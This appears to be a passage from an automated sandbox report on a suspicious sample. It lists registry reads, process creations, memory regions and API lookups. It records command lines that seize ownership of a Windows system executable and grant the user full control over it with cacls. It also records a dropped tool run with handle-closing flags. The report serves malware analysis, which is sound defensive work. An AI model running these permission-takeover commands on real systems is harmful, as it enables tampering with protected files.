| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xc84, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x118, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xc64, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "PhotoViewer.dll.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "PhotoViewer.dll.mui" |
|
1 |
Process #143: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #143 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:48, Reason: Child Process |
| Unmonitor | End Time: 00:02:50, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x434 |
| Parent PID | 0x76c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FD4
0x
940
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000cf0000 | 0x00cf0000 | 0x04ceffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04d0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cf0000 | 0x04cf0000 | 0x04cfffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d10000 | 0x04d10000 | 0x04d11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d10000 | 0x04d10000 | 0x04d13fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d20000 | 0x04d20000 | 0x04d33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04d7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04dbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004dc0000 | 0x04dc0000 | 0x04dc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004dd0000 | 0x04dd0000 | 0x04dd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04de1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04e2ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x04e30000 | 0x04e31fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004e60000 | 0x04e60000 | 0x04e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e70000 | 0x04e70000 | 0x050bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04e70000 | 0x04f2dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f30000 | 0x04f30000 | 0x04f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fc0000 | 0x04fc0000 | 0x050bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050c0000 | 0x050c0000 | 0x0528ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05290000 | 0x055c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f310000 | 0x7f310000 | 0x7f40ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f410000 | 0x7f410000 | 0x7f432fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f434000 | 0x7f434000 | 0x7f434fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f439000 | 0x7f439000 | 0x7f43bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f43c000 | 0x7f43c000 | 0x7f43efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f43f000 | 0x7f43f000 | 0x7f43ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #144: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #144 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:48, Reason: Child Process |
| Unmonitor | End Time: 00:02:50, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x958 |
| Parent PID | 0xa64 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
850
0x
950
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00210000 | 0x00239fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00867fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x009f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x01dfffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x73d90000 | 0x73e21fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
